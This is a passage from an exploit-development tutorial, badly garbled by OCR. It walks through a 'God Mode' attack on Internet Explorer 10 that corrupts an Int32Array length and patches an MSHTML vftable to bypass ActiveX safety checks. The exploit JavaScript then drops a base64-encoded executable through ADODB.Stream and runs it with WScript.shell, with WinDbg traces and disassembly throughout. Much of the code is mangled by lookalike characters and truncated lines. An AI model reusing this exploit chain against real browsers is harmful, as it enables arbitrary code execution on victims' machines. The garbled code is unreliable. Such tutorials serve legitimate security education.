6ed25634 6e1e16d9 MSHTML!TearoffThunk21 
6ed25638 6e397b23 MSHTML!TearoffThunk22 
6ed2563c бе2с2734 MSHTML!Tearofffhunk23 
6ed25640 6e3975ed MSHTML!TearoffThunk24 
6ed25644 6e5728c5 МӘНТМІ!ТеагоНТһипк25 
6ed25648 6e475a7d MSHTML'!TearoffThunk26 
6ed2564c 66456310 MSHTML! TearoffT hunk27 
6ed25650 6e46ff2d MSHTML'!TearoffThunk28 
6ed25654 6e45a803 MSHTML!TearoffThunk29 
6ed25658 6e47d81a MSHTML!TearoffThunk30 
6ed2565c 6e2d3f19 MSHTML!TearoffThunk31 





Determining the RVA of the vftable is quite easy: 


0:007» ? MSHTML!s apfnPlainTearoffVtable-mshtml 


Evaluate expression: 12932576 = 00c555e0 
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Mapping file section regions... 

Mapping module regions... 

Mapping PEB regions... 

Mapping TEB and stack regions... 
Mapping heap regions... 

Mapping page heap regions... 

Mapping other regions... 

Mapping stack trace database regions... 


Mapping activation context regions... 


Usage: Image 

Base Address: 04e11000 

End Address: 05094000 

Region Size: 00283000 

State: 00001000 MEM COMMIT 

Protect: 00000020 PAGE EKECUTE READ 
Type: 01000000 MEM IMAGE 

Allocation Base: 04e10000 

Allocation Protect: 00000080 PAGE EKECUTE WRITECOPY 
Image Path: C:\Windows\SysWOW64\jscript9.dll 
Module Name: jscript9 

Loaded Image Мате: C:\Windows\SysWOW64\jscript9.dll 
Mapped Image Name: 


More info: Imv m jscript9 


More info: ШИ jscript9 


More info: In 0х4еес164 


More info: Idh 0x4e10000 





0:007> ? 04eec164-jscript9 
Evaluate expression: 901476 - 000dc164 





So the vftable is at and we need to overwrite the dword at 
with the value . Let’s see the javascript code to do this: 
JavaScript 


ir old = read(mshtml+0xc555e0+0x14); 
write(mshtml+0xc555e0+0x14, jscript9--0xdc164); 


shell = ActiveXObject("WScript.shell"); 
shell.Exec('calc.exe"); 





write(mshtml+0xc555e0+0x14, old); 


Note that the code restores the vftable as soon as possible ( ) because the altered vftable 
would lead to a crash in the long run. 


Неге'5 the ШІ code: 
XHTML 


«html» 
«head» 
«script language="javascript"> 


(function() { 
alert("Starting!"); 
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for (i = 0; i < 0x200; ++i) { 
a[i] = new Array(0x3c00); 
if (i == Ox80) 
buf = new ArrayBuffer(0x58); 
for (j = 0; j < a[i].length; ++j) 
a[i]j] = 0x123; 
) 


for (; i < 0x200 + 0x400; ++i) { 
ali] = new Array(Ox3bf8) 
for (| = 0; j < 0x55; ++]) 
a[i]j]] = new Int32Array(buf) 


alert("Set byte at OcOaf01b to 0x20"); 


int32array = 0; 
for (i = 0x200; i < 0x200 + 0x400; ++i) 4 
for (| = 0; | < 0x55; ++)) { 
if (a[i][j].Kength != 0x58/4) { 
int32array = а[ ||]; 
break; 


} 


} 
if (int32array != 0) 
break; 


} 


if (int32array == 0) { 
alert("Can't find int32array!"); 
window. location.reload(); 
return; 


} 
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[0x60/4], 

[0x60*2/4], 

[0x60*3/4], 
[(0x60--0x24)/4], 
[(Ox60*2+0x24)/4], 
[(Ox60*3+0x24)/4]; 

xffff != 0х6е18 || vftptr1 !- vftptr2 

r1 |= 0x60 || nextPtr3 - 


| TO н): 
ition.reload(); 


18 


== e Wm Wi 


(РЕМ - 0x60*2; 


if (int32array[(OxOcOaf000+0x1c - buf. addry/4] = 
rt("Error!"); 


id(); 


t32array[(OxOcOaf000+0x18 - buf addr)/4] = 0x20000000; 
2array[(0x0cOaf000-0x1c - buf addr)/4] = 0; 


idress-k)/4] >> k*8) | 
5-к+4)/4] << (32 - k*8)); 
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-К)/4]; 
1t32array|(address-k+4)/4]: 
= (1 << k*8) - 1; // Oxff or Ox 
& ДК 558); 
jh & (Oxffffffff - mask)) | ( 
-k)/4] = low; 
-к+4)/4] = 


t9 = read(0x0cOaf000) -Ox3b60; - 


for (i = 0x200; i < 0x200 + 0x400; ++i) 
[i][Ox3bf7] = 0; 


(0xOcOaf000-4, 3); 
E 0; 
for (i = 0x200: i < 0x200 + 0x400; ++) ( 
if (a[i][Ox3bf7] != 0) ( 
IKArray = ali]; 


| 
гла: 
ргеак 

ргеак; 


iddr(obj) { 
[0x3bf7] = obj; 
1(ОхОс0аї000-4, obj); 


http: 
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Ir(document.creat 
Ir + 0x10) - 0x58b9a; 


(mshtml+0xc555e0+0x14); 
ml+0xc555e0+0x14, t9--0xdc164); 


shell"); 


а!с.ехе 


tml+0xc555e0+0x14, old); 


"АП допе!"); 


Open it in IE and, when the alert box tells you, go in WinDbg and set the byte at to or the 
dword at to . Then close the alert box and the calculator should pop up. If there is an 
error (it may happen, as we already saw), don’t worry and repeat the process. 


Running arbitrary code 


We saw how to run an executable present on the victim's computer. Now let's see how we can execute 
arbitrary code. The trick is to create an .exe file and then execute it. This is the code to do just that: 


XHTML 


language="javascript" 
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| won't explain the details of how this code works because | don't think that's very interesting. 


First of all, let's create a little application which open the calculator. In real life, we'd code something more 
interesting and useful, of course, but that's enough for a demonstration. 


Create a C/C++ in Visual Studio 2013 with the following code: 
С++ 


#include "windows.h" 


int CALLBACK WinMain( 
In HINSTANCE hinstance, 
In HINSTANCE hPrevinstance, 
“їл LPSTR јрСта пе, 
_In_ int nCmdShow) { 
WinExec("calc.exe", SW SHOW); 
return 0; 
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Change the project properties as follows: 


• [Release] 
о Configuration Properties 
в C/C++ 
. Code Generation 
. Runtime Library: Multi-threaded (/MT) 


This will make sure that the runtime library is statically linked (we want the exe file to be standalone). Build 
the Release version and you should have a 68-KB file. Mine is named runcalc.exe. 


Now encode runcalc.exe in base64 with a little Python script: 
Python 





Now copy and paste the encoded data into the javascript code above so that you have 


JavaScript 





| snipped the string because too long, but you can download it here: гипсаіс. 


Open the html file in IE and you'll see that the calculator doesn't pop up. To see what's wrong, open the 
Developer Tools (F12), go to the Console tab and then reload the page. Here's what we get: 
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&| CAusers\gandalf\Deskt D ~ С) {© CAusers\gandalf\D... 


File Find Disable View Images Cache Tools Validate | Browser Mode: IE10 Document Mode: Quirks 


HTML CSS Console) Script Profiler Network 


=>] ж $) Start debugging | Console Watch Locals | Callstack — Breakpoints 


;/Users/gandalf/Desktop/activex2. Es Á H 


9P8Y /z3 /oPuBgAACUAAAABzACMCYwP zB JMF YwYDBwMKAwv TDbMPAw-- 3B; ар 
8P8Q/zD/UP9w/5D/ sP /Q/ /DBAGAAAhALAAAQwDDAUMBwwJDAsMDQwPDBE E SCRIPTA29: Automation server can't create object 
*Dz8PAASBDOIPQw9EDOUPSA9 JDOoPSw9MDOOPTg9PD1EPUg9 YDOAAAAA/ 


createExe(fname, data) 4 
tStream = ActiveXObject("ADODB.Stream"); 
bStream - ActiveXObject( ADODB.Stream ); 


tStream.Type - 2; // text 
bStream.Type - 1; // binary 
tStream.Open(); 





The problem is that Microsoft decided to disable in Internet Explorer because 
is intrinsically unsafe. For now, let's reenable it by using a little utility called acm (download). 


Install acm, run it and enable like shown in the following picture: 
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Ж. ActiveX Compatibility Manager 
File Edit View Options Help 
%х Ыш ъз] 


| Status | File Description Company | Produ File Version эд Control Filename 


5 


ActiveX Data Objects 6.1.7601.17.. ADODB.Stream.6.0 


Inkfile 


11/2014 21416 
730 item(s), 1 Selected 





Now restart IE and open the html file again. This time the calculator will pop up! 


The problems are not over, unfortunately. 


Download an utility called from here: : 
We're going to use it to run the html file as if it were served by a . SimpleServer is easy to 
configure. Just create a folder called оп the Desktop, сору the html file into that folder, then гип 


SimpleServer and select the html file like indicated in the following picture: 


AnalogX SimpleServer WWW 


http://10.0.2.15/ 


simple server 
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Then click on Start. Now open IE and open the page at the address . The calculator won't pop up. 
Once again, use the Developer Tools to see what's wrong: 


(© 127001 


File Find Disable View Images Cache Tools Validate | Browser Mode: IE10 Document Mode: Quirks 
HTML CSS  Console| Script | Profiler Network 
hs Ej >” +) Start debugging | console Watch ocals Call stack ^ Breakpoints 


http://127.0.0.1/ ev ij 


arr.push(String.fromCharCode(low + high * 0x100)); ^ 127.0.0.1, line 1 character 1 


1 
4 
return arr.join(''); 127.0.0.1, line 40 character 3 


shell = new ActiveXObject( 33 
tname = shell.ExpandEnvironmentStrings( 
saveBinaryData(fname, decode(runcalc)); 
shell.Exec(fname); 





It seems that things work differently when we receive a page from a server. 


Change the settings as shown in the following picture: 
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Internet Opt Security At 


General | Security | Privacy | Content | Connections | Programs | Advanced 


Your security settings put your computer at risk 


Internet 


This zone is for Internet w 
cept those || in trusted and 
stricted zones. 


File Find Disable V 
Co 
- Your security settings are below the recommended 
level, puttin computer at an increased risk of 
online attack 


- To change the settings, click Custom |. 
- To use the recommended settin ick Default level. 


У | Enable Protecte ernet Explorer) 


| | Default level 


Reset all zones to default level 


Cancel 


Reload the page and you should see another error: 
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Internet Zone 


9) Prompt (recommended) 
Do ad unsigned Acti 
9) Disable (recommended) 
Enable (not 
Prompt 


Initialize and script ActiveX controls not marked as 


Disabl commended) 

©) Enable (not secure) 
Prompt 

omy aton approved qormams v 
Disable 

9) Enable 

Run ActiveX controls and plug-ins 

ministrator approved 


9) Enable 
Prompt 
4 ш 


*Takes effect after you restart your computer 
Reset custom settings 


Reset to: | Medium-high (default) 


remer wo Prompt 


| | Cancel 
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File Find Disable View Images Cache Tools Validate | Browser Mode: IE10 Document Mode: Quirks 


HTML CSS Console Script Profiler Network 

№ ЕД a” Start debugging Console Watch Locals Call stack  Breakpoints 

http://127.0.0.1/ av Д 
tStream.Open(); ‹ 
bStream.Open(); o SCRIPT3716: Safety settings on this computer prohibit accessing a data source on another domain. 
tStream.Writelext(data); r 
tStream.Position - 2; 
tStream.CopyTo(bStream); 
bStream.SaveToFile(fname, 2); 
tStream.Close(); 
bStream.Close(); 

1 








function decode(b64Data) { 


OK, now is time to solve all these problems. Reset all the settings in IE and disable again ADODB.Stream 
with the utility acm. Here's the full code we're going to work on: 


XHTML 


«html» 
«head» 
<script language="javascript"> 
(function() { 
alert("Starting!"); 


a = new Array(); 


for (i = 0; i < 0x200; ++i) { 
a[i] = new Array(0x3c00); 
if (i == 0x80) 
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buf = new ArrayBuffer(0x58); 
for (j = 0; j < ај] Лепа ћ; ++j) 
a[i][j] = 0x123; 


for (; i < 0х200 + 0x400; ++i) ( 
ali] = new Array(Ox3bf8) 
for (| = 0; j < 0x55; ++]) 
a[i]j] = new Int32Array(buf) 


alert("Set byte at OcOaf01b to 0x20"); 


int32array - 0; 
for (i = 0x200; i < 0x200 + 0x400; ++i) ( 
for (| = 0; | < 0x55; ++) { 
if (ај лепаћ != 0x58/4) { 
int32array = а[ |]; 
break; 


} 


} 
if (int32array != 0) 
break; 


} 


if (int32array == 0) { 
alert("Can't find int32array!"); 
window. location.reload(); 
return; 


} 
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rray[0x60/4], 
[0x60*2/4], 
2аггау[0х60*3/4], 
'array[(0x60--0x24)/4], 
[(Ox60*2+0x24)/4], 
3= [(0x60*3--0x24 /4]; 
& Oxffff != 0хбе18 || vftptr1 !- vfi 


|= 0x60 || 


(0: 


Error!"); 


[Г = trl - 0x60*2; 
if int32array[(0xOcOaf00040x1c - buf addr)/4] != buf. адаг) ( 
ilert("Error!"); 
ы 40) 


return; 


ay[(OxO0cOaf000+0x18 - buf addr)/4] = 0x20000000; 
irray[(0xOcOaf000-0x1c - bu Idr)/4] = 0; 


idress-k)/4) >> КЗ) | 
s-k+4)/4] << (32 - k'8)) 


| = int32array[(addi 
=(1 << k*8)-1; 70 
low & ma 


http: //expdev-kiuhnm.rhcloud.com 





EXPLOIT DEVELOPMENT COMMUNITY 


& (Oxffffffff - n )) | (value >> (32 - k*8)); 
2 y4] = 5 
-k+4)/4] = 


I(OxOcOaf000) - 0x3b60; 


for (i = 0x200; i < 0x200 + 0x400; ++i) 
[i][Ox3bf7] = 0; 


(OxOcOaf000-4, 3); 
= 0; 


for (i = 0x200; i < 0х200 + 0x400; ++i) ( 
if (a[i][(Ox3bf7] != 0) { 
IKArray = ali]; 


break; 


iddr(obj) { 
[Ox3bf7] = obj; 
I(OxOcOaf000-4, obj); 


Ir(docu t t 
+ 0x10) - 0x58b9a; 
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(mshtml+0xc555e0+0x14); 
+0xc555e0+0x14, t9--0xdc164); 
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| snipped the value of runcalc because it was too long. You can download the full code from here: code1. 


Use SimpleServer to serve this code. Go to 127.0.0.1 in IE and when the dialog box pops up do what it says 
in WinDbg. Unfortunately, IE crashes here: 


6ef82798 90 nop 
IEFRAME!CDocObjectHost:: ScriptErr Піс: 

6ef82799 8bff mov  edi,edi 

6ef8279b 55 push ебр 

6ef8279c 8bec mov ебр,еѕр 

беї8279е b870100000 тоу eax,1070h 

6ef827a3 e86ee8f0ff са! IEFRAME! alloca probe (бее91016) 
6ef827a8 a1b874376f тоу  eax,dword ptr [IEFRAME! security cookie (6137 7468)] 
6ef827ad 3325 xor  eax,ebp 

Gef827af 8945fc mov  dword ptr [ebp-4],eax 

6ef827b2 53 push ebx 

6ef827b3 33db xor  ebx,ebx 

6ef827b5 57 push edi 

6ef827b6 8bf9 mov  edi,ecx 


6ef827be 018468890с00 је IEFRAME!CDocObjectHost::_ScriptErr_Dlg+0x3d (6104617с) 
6ef827c4 e99d890c00 jmp IEFRAME!CDocObjectHost::_ScriptErr_Dlg+0x27 (6f04b166) 
6ef827c9 90 пор 

6ef827ca 90 пор 

6ef827cb 90 пор 

6ef827cc 90 nop 

6ef827cd 90 пор 

ІЕҒКАМЕ!СбосОрбіесінНов: ScriptErr Сасһеіпіо: 

6ef827ce 8bff mov  edi,edi 

6ef827d0 55 push ebp 

6ef827d1 8bec mov  ebp,esp 

6ef827d3 81eca8000000 sub евр,0А8һ 
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6ef827d9 a1b874376f тоу  eax,dword ptr [IEFRAME! security cookie (6137 7458)] 


беї827ае 33c5 xor  eax,ebp 





This might be a problem with our God Mode. Let's find out by modifying our javascript code as follows: 
JavaScript 
ar old = read(mshtml*0xc5556e0- 0x14); 


write(mshtml+0xc555e0+0x14, jscript9--0xdc164); 
alert("bp оп " + (mshtml+0xc555e0+0x14).toString(16)); 





We just add an alert right after the activation of the God Mode. Restart IE and WinDbg and repeat the whole 
process. 


| must admit that | де ће message box a lot. Let's change some values and see if things get better. 
Here are the changes: 


JavaScript 


<html> 
<head> 
<script language="javascript"> 
( 0t 
alert("Starting!"); 


(i = 0; i < 0x300; ++i) { 
ali] = Array(0x3c00); 
(i == 0x100) 
buf = new ArrayBuffer(0x58); 
(j = 0; j < a[i].Jength; ++j) 
a[i][j] = 0x123; 


) 
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// 0x24: array[1] address 

WE a 

// Oxf000: Int32Array 

// Oxf030: Int32Array 

727 

// ОхїїсО: Int32Array 

// OxfffO: align data 

for Gi < о + 0x400; 444) ( // <------------ from 0x200 to 0x300 
| e 1y(Ox3bf8) 
г (| ] < 0x55; ++j) 

ЇЙЇ] = new Int32Array(buf) 


// vftptr 
// Осбатооо: 70583560 031с98а0 00000000 00000003 00000004 00000000 20000016 08ce0020 
// Осда!020: 03133de0 array len buf addr 
/ jsArrayBuf 
lert("Set byte at OcOaf01b to 0x20"); 


// Now let's find the Int32Array whose length we modified. 
nt32array - 0; 
for (i = 0x300; i < 0x300 + 0x400; ++i) { / from 0х200 to 0x300 
for (j = 0; j < 0x55; ++]) { 
if (a[i][j].JFength != 0x58/4) { 





Ah, much better! Now it’s way more stable, at least on my system. 


Finally, the dialog box with the address of the modified entry in the vftable pops up. In my case, it says 
. Let’s put a breakpoint on access: 


ba r4 mshtml+0xc555e0+0x14 


After we hit F5 and we close the dialog, the execution stops here: 


0555c15a 5f pop edi 
0555c15b 5e pop esi 
0555c15c 33cd xor 1041-1019) 


0555c15e 5b pop ebx 
0555c15f e8da51f2ff ^ call jscript9! security check cookie (05481336) 


0555c164 c9 leave ме аге ћеге 
0555c165 с20400 ret 4 
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Here's the stack trace: 


0:007» k 5 

ChildEBP RetAddr 

03e0bbb4 05556Ығае jscript9!ScriptEngine::CanObjectRun+0xaf 
03e0bc00 0555bde1 jscript9!ScriptSite:: CreateObjectFromProg|D+0Oxdf 


03e0bc44 05555969 jscript9!ScriptSite::CreateActiveXObject+0x56 
03e0bc78 05422545 jscript9! JavascriptActiveXObject::NewInstance-*0x90 
03e0bcd0 054ccd4a jscript9! Js::InterpreterStackFrame::NewScObject Helper*0xd6 





OK, мете inside CreateActiveXObject so everything is proceeding as it should. Let's hit F5 again. Now the 
execution stops on the same instruction but the stack trace is different: 
0:007» К 10 

ChildEBP RetAddr 

03e0a4dc 6eeb37aa jscript9!ScriptEngine::CanObjectRun+Oxaf 

03е06778 бееаасЗе IEFRAME!CDocObjectHost::OnExec+0xf9d 

03e0b7a8 6c9d7e9a IEFRAME!CDocObjectHost::Exec+0x23d 

03е06810 6c9d7cc7 MSHTML!CWindow::ShowErrorDialog+0x95 

03e0b954 6c9d7b68 МНТМЕ!СОт\МИпаом/Ргоху::Е ге _опеггог+0хсб 
03e0bbc0 6c9d7979 MSHTML!CMarkup::ReportScriptError+0x179 

03e0bc40 0555dbe4 MSHTML!CActiveScriptHolder::OnScriptError+0x14e 
03e0bc50 0555e516 jscript9!ScriptEngine::OnScriptError+0x17 

ОЗеббсбс 0555е466 jscript9!ScriptSite::ReportError+0x56 

03e0bc78 0555e460 jscript9!ScriptSite:: HandleJavascriptException+0x1b 
03e0c3d8 05492027 jscript9!ScriptSite::CallRootFunction+0x6d 

03е0с400 0553df75 jscript9!ScriptSite::Execute+0x61 

03e0c48c 0553db57 jscript9!ScriptEngine::ExecutePendingScripts+0x1e9 
03е0с514 0553e0b7 jscript9!ScriptEngine::ParseScriptTextCore*0x2ad 
03е0с568 6c74b60c jscript9! ScriptEngine::ParseScriptT ext+0x5b 

03e0c5a0 62с749454 MSHTML!CActiveScriptHolder::ParseScriptT ext+0x42 





After a little bit of stepping IE crashes as before. It seems we have a problem with our God Mode. Probably, 
our problem is that we modified the vftable itself which is used by all the objects of the same type. We 
should create а modified сору of the original vftable and таке the object мете interested in point to it. 
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ІЕ10: God Mode (2) 


Fixing the God Mode 
Before doing something radical, let’s try to find out where the crash is. To do this, let’s add a few alerts: 


JavaScript 


jh * 0x100)); 


+0xc555e0+0x14, 
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alert("All допе!"); 


Now reload the page in IE (by going to 127.0.0.1), change the length of the Int32Array at OxcOaf000 and see 
what happens. You should see all the three alert box from 1 to 3 and then the crash. Therefore, we can 
conclude that the crash happens when we execute the following instructions: 


JavaScript 


'ADODB.Stream"); 





ject("ADODB.Stream"); 


Why isn't there any problem with WScript.shell? 


A difference should come to mind: ADODB.Stream was disabled by Microsoft! Maybe something happens in 
jscript9!ScriptSite::CreateObjectFromProgID... Let's see. 


Repeat the process and this time, when the alert box with 3 appears, put a breakpoint on 
јѕсгірі9!5сгіріЅіќе::СгеаіеОбјесіҒготРгодір. Let's do some stepping inside CreateObjectFromProglD: 
jscript9!ScriptSite::CreateObjectFromProgID: 

04f3becb 8bff mov edi,edi 

04f3becd 55 push ebp 

04f3bece 8bec том ебр,еѕр 

04f3bed0 83ec34 sub  esp,34h 

04f3bed3 a144630f05 тоу eax,dword ptr [jscript9!_ security cookie (050f6344)] 
04f3bed8 33c5 xor  eax,ebp 

04f3beda 8945fc mov  dword ptr [ebp-4],eax 

04f3bedd 53 push ebx 

04f3bede 8b5d0c mov  ebx,dword ptr [ebp* OCh] 

O4f3bee1 56 push esi 

O4f3bee2 33с0 хог  eax,eax 

04f3bee4 57 push edi 

04f3bee5 8b7d08 mov edi,dword 0) [ebp+8] 

04f3bee8 8bf2 mov  esi,edx 

04f3beea 8975dc mov  dword ptr [ebp-24h],esi 

04f3beed 8945cc mov dword ріг [ebp-34h],eax 

04f3bef0 897dd0 mov dword ptr [ebp-30h],edi 

04f3bef3 8945d4 том  dword ptr [ebp-2Ch],eax 
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04f3bef6 8945d8 том dword ptr [ebp-28h],eax 

04f3bef9 8945e8 mov  dword ptr [ebp-18h],eax 

O4f3befc 85ff test edi,edi 

04f3befe 0f85e26a1600 jne  jscript9!memset+0xf390 (050а29е6) 

04f3bf04 8b4604 mov еах,дмога ptr [esi+4] 

04f3bf07 е8а5000000 call jscript9!ScriptEngine::InSafeMode (04f3bfe1) 

04f3bf0c 8560 test eax,eax 

04f3bf0e 8d45ec lea eax,[ebp-14h] 

OAf3bf11 50 push eax 

OAf3bf12 51 push ecx 

04f3bf13 0184486а1600 je  jscript9!memset+Oxf39b (050a29f1) 

04f3bf19 ff1508400e05 call dword ptr [jscript9!_ imp _CLSIDFromProgID (050e4008)] 
04f3bf1f 85с0 test eax,eax 

04f3bf21 0f88e867fcff js  jscript9!ScriptSite::CreateObjectFromProgID+Oxf6 (04f0270f) 
04f3bf27 8d45ec lea eax,[ebp-14h] 

04f3bf2a 50 push eax 

04f3bf2b 864604 том  eax,dword ptr [еѕі+4] ds:002b:02facc44-02f8c480 

04f3bf2e е8е2030000 call jscript9!ScriptEngine::CanCreateObject (0413с315) < 
04130133 85с0 test eax,eax 

04f3bf35 Of84d467fcff је  jscript9!ScriptSite::CreateObjectFromProgID+O0xf6 (04102707) < 


04102 707 bead010a80 том езѕі,800АО1АРһҺ 
04102714 e99d980300 jmp jscript9!ScriptSite::CreateObjectFromProg!lD+0xe3 (04f3bfb6) 


O4f3bfb6 8b4dfc том есх,мога ріг [ебр-4] ss:002b:03feb55c=91c70f95 
O4f3bfb9 5f рор edi 

04f3bfba 8bc6 mov eax,esi 

O4f3bfbc 5e pop esi 





http://expdev-kiuhnm.rhcloud.com 





- 393 - 





O4f3bfbd 33cd xor  ecx,ebp 
O4f3bfbf 5b pop ебх 


O4f3bfcO e87953f2ff ^ call jscript9! security check cookie (04e6133e) 
04f3bfc5 c9 leave 
04f3bfc6 c20800 ret 8 





As we can see, returns 0 and our familiar is not even called. What 
happens if we force to return ( )? Try to repeat the whole process, but this 
time, right after the call to ‚ set to 1 (use ). Remember that you need to do that 
twice because we create two objects. 


Now the alert box with 4 appears but we have a crash after we close it. Why don't we try to keep the God 
Mode enabled only when strictly necessary? Let's change the code as follows: 


JavaScript 


old = read(mshtml*0xc555e0-0x14); 


runcalc = 'TVqQAAMAAAAEAAAA//8AA <ѕпірреа> ААААААААААААААААААААА'; 
tion createExe(fname, data) ( 
write(mshtml+0xc555e0+0x14, jscript9--0xdc164); 
r tStream = new ActiveXObject('ADODB.Stream"); 
г bStream = new ActiveXObject("ADODB.Stream"); 
write(mshtml+0xc555e0+0x14, old); 


tStream.Type - 2; 
bStream.Type = 1; 
tStream.Open(); 
bStream.Open(); 
tStream.WriteText(data); 
tStream.Position = 2; 
tStream.CopyTo(bStream); 


bStream.SaveToFile(fname, 2); 
tStream.Close(); 
bStream.Close(); 


decode(b64Data) { 
data = window.atob(b64Data); 


r arr = new Array(); 

r (var i = 0; i < data.length / 2; ++i) { 
ar low = data.charCodeAt(i*2); 
ir high = data.charCodeAt(i*2 + 1); 
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le(low + high * 0x100)); 


ml+0xc555e0+0x %0хас164); 
i ("WScript.shell") 


shtml+0xc555e0+0x 





Let's try again to load the page and set EAX to 1 right after CanCreateObject. This time, let's put the 
breakpoint directly on CanCreateObject: 


bp jscript9!ScriptEngine::CanCreateObject 


When the breakpoint is triggered, hit Shift+F11 and then set БАХ to 1 (the first time it's already 1). OK, now 
there is no crash but the calculator doesn't appear. If you repeat the process with the Developer Tools 
enabled, you should see the following error: 
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© nttp://127.0.0.1/  ~ ВО | Æ waiting for 127.0.0.1 


File Find Disable View Images Cache Tools Validate | Browser Mode: IE10 Document Mode: Quirks 
HTML CSS Console Script Profiler Network 

S [ву 

i 


127.0.0.1, line 1 character 1 


127.0.0.1, line 220 character 7 





Let's leave that error for later. For now we should be happy that we (almost) solved the problem with the 
God Mode. We still need to modify the behavior of somehow so that it always returns true. 
Again, repeat the whole process and put a breakpoint on . When the breakpoint is 
triggered, we can begin to examine 


jscript9!ScriptEngine::CanCreateObject: 
04dcc315 8bff том edi,edi 
04dcc317 55 push ebp 
04dcc318 8bec mov  ebp,esp 
04dcc31a 51 push есх 


04dcc31b 51 push ecx 

04dcc31c 57 push edi 

04dcc31d 8618 mov  edi,eax 

04dcc31f 6876401000008 test byte ptr [edi+1E4h],8 

04dcc326 743d je  jscript9!ScriptEngine::CanCreateObject+0x50 (049сс365) 
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04dcc328 8d45fc lea eax,[ebp-4] 

04асс32Ь 50 push eax 

04dcc32c е8 42000000 call = jscript9!ScriptEngine::GetSiteHostSecurityManagerNoRef (04dcc373) 
04dcc331 85c0 test eax,eax 

04dcc333 7835 js jscript9!ScriptEngine::CanCreateObject+0x55 (04dcc36a) [br=0] 
04dcc335 8b45fc mov  eax,dword ptr [ebp-4] 

04dcc338 8608 mov  ecx,dword ptr [eax] ecx = object.vftptr 


04асс3За ба00 ризћ 0 

04dcc33c 6a00 push 0 

04dcc33e 6a10 push 10h 

049сс340 #7508 push dword ptr [ebp+8] 

04dcc343 8d55f8 lea edx,[ebp-8] 

04dcc346 6a04 push 4 

04dcc348 52 push edx 

044сс349 6800120000 ризћ 1200h 

04dcc34e 50 push eax 

04dcc34f ff5110 call dword ptr [ecx+10h] ds:002b:6ac755f0={MSHTML!TearoffThunk4 (6a25604a)} 
04dcc352 85c0 test eax,eax 

04dcc354 7814 js jscript9!ScriptEngine::CanCreateObject+0x55 (04dcc36a) 
04dcc356 f645f80f test byte ptr [ebp-8],0Fh 

04асс35а ба00 ризћ 0 

04dcc35c 58 pop eax 

04dcc35d 0#94с0 зеје а! 

04dcc360 5f pop edi 

04dcc361 c9 leave 

04dcc362 с20400 ret 4 





Look at the virtual call at 04dcc34f: we can use the same trick we used with CanObjectRun! As before, ECX 
points to a vftable: 


0:007> dds ecx 
бас755е0 6a0b2681 MSHTML!PlainQueryInterface 


бас755е4 6a0b25a1 MSHTML!CAPProcessor::AddRef 
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бас755е8 6a08609d MSHTML!PlainRelease 
6ac755ec 6a078eb5 MSHTML!TearoffThunk3 
6ac755f0 6a25604a MSHTML'!TearoffThunk4 ме need to modify this for CanCreateObject 
6ac755f4 04dcc164 jscript9!ScriptEngine::CanObjectRun+Oxaf < this is our fix for CanObjectRun! 
6ac755f8 6a129a77 MSHTML! TearoffThunk6 
6ac/55fc 6a201a73 MSHTML!TearoffThunk7 
бас75600 6a12770c MSHTML!TearoffThunk8 
бас75604 6a12b22c MSHTML!Tearofffhunk9 
бас75608 6a12b1e3 MSHTML!TearoffThunk10 
6ac7560c 6a257db5 MSHTML'TearoffThunk1 1 
6ac75610 6a12b2b8 MSHTML'!TearoffThunk12 
бас75614 6a332a3d MSHTML'!TearoffThunk13 
6ac75618 62242719 MSHTML'!TearoffThunk14 
бас7561с ба254879 MSHTML!Tearofffhunk15 
6ac75620 6a12b637 MSHTML! TearoffThunk16 
6ac75624 6a131bf3 MSHTML!TearoffThunk17 
6ac75628 ба129649 MSHTML!TearoffThunk18 
бас7562с ба4а8422 MSHTML'!TearoffThunk19 
6ac75630 6a58bc4a MSHTML!TearoffThunk20 
6ac75634 ба131649 MSHTML! TearoffThunk21 
6ac75638 6a2e7b23 MSHTML! Tearofffhunk22 
6ac7563c ба212734 MSHTML!Tearofffhunk23 
бас75640 6a2e75ed MSHTML!TearoffThunk24 
6ac75644 6a4c28c5 MSHTML! TearoffThunk25 
бас75648 6a3c5a7d MSHTML!TearoffThunk26 
6ac7564c баЗа6310 MSHTML!TearoffThunk27 
6ac/5650 6a3bff2d MSHTML'!TearoffThunk28 
бас75654 базаавоз MSHTML'!TearoffThunk29 
бас75658 6a3cd81a MSHTML'!TearoffThunk30 
6ac/565c 6a223f19 MSHTML!TearoffThunk31 





As you can see, that's the same vftable we modified for CanObjectRun. Now we need to modify [ecx- 10h] 
for CanCreateObject. We might try to overwrite [ecx* 10h] with the address of the epilog of CanCreateObject, 
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but it won’t work. The problem is that we need to zero out ED! before returning from CanCreateObject. 
Here’s the code right after the call to CanCreateObject: 


O4ebbf2e e8e2030000 call jscript9!ScriptEngine::CanCreateObject (04ebc315) 
04ebbf33 85c0 test eax,eax 
04ebbf35 0f84d467fcff je  jscript9!ScriptSite::CreateObjectFromProgID+0xf6 (04e8270f) 


04ebbf3b 6a05 push 5 

04ebbf3d 58 pop eax 

04ebbf3e 85ff test edi,edi 

04ebbf40 Of85b66a1600 jne jscript9!memset+0xf3a6 (050229fc) taken if EDI != 0 





If the jne is taken, CreateObjectFromProgID and CreateActiveXObject will fail. 
| looked for hours but | couldn't find any suitable code to call. Something like 
Assembly (x86) 





would be perfect, but it just doesn't exist. | looked for any variations | could think of, but to no avail. | also 
looked for 


Assembly (x86) 


dword ptr [edx], 0 


t 20h 





and variations. This code would mimic a call to the original virtual function and clear [65p-8]. This way, 
CanCreateObject would return true: 

04dcc338 8b08 mov  ecx,dword ptr [eax] 

04асс3ЗЗа ба00 ризћ 0 

04асс3Зс ба00 ризћ 0 

04dcc33e 6a10 push 10h 

04dcc340 #7508 push dword ptr [ebp+8] 


04dcc343 8d55f8 lea edx,[ebp-8] 
04dcc346 6a04 push 4 
04dcc348 52 push edx 
044сс349 6800120000 push 1200h 
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04dcc34e 50 push eax 

04dcc34f #5110 call dword ptr [ecx* 10h] ds:002b:6ac755f0={MSHTML! TearoffThunk4 (6a25604a)} 
04dcc352 85c0 test eax,eax 

04dcc354 7814 js јѕсгірі!ЅсгіріЕподіпе::СапСгеаїеОбјесі+0х55 (04ассЗба) 

04dcc356 f645f80f test byte ptr [ебр-8],ОРЋ if [ebp-8] == 0, then ... 

04ассЗ5а ба00 ризћ 0 


04ассЗ5с 58 рор еах 

04dcc35d 0#94с0 зеје а! ... then EAX = 1 
04dcc360 5f рор edi restores EDI (it was 0) 
04dcc361 c9 leave 

04dcc362 с20400 ret 4 





Note that this would also clear EDI, because ED! was 0 when CanCreateObject was called. 
Next, | tried to do some ROP. | looked for something like this: 
Assembly (x86) 


Unfortunately, | couldn't find anything similar. If only we could control some other register beside E CX... 





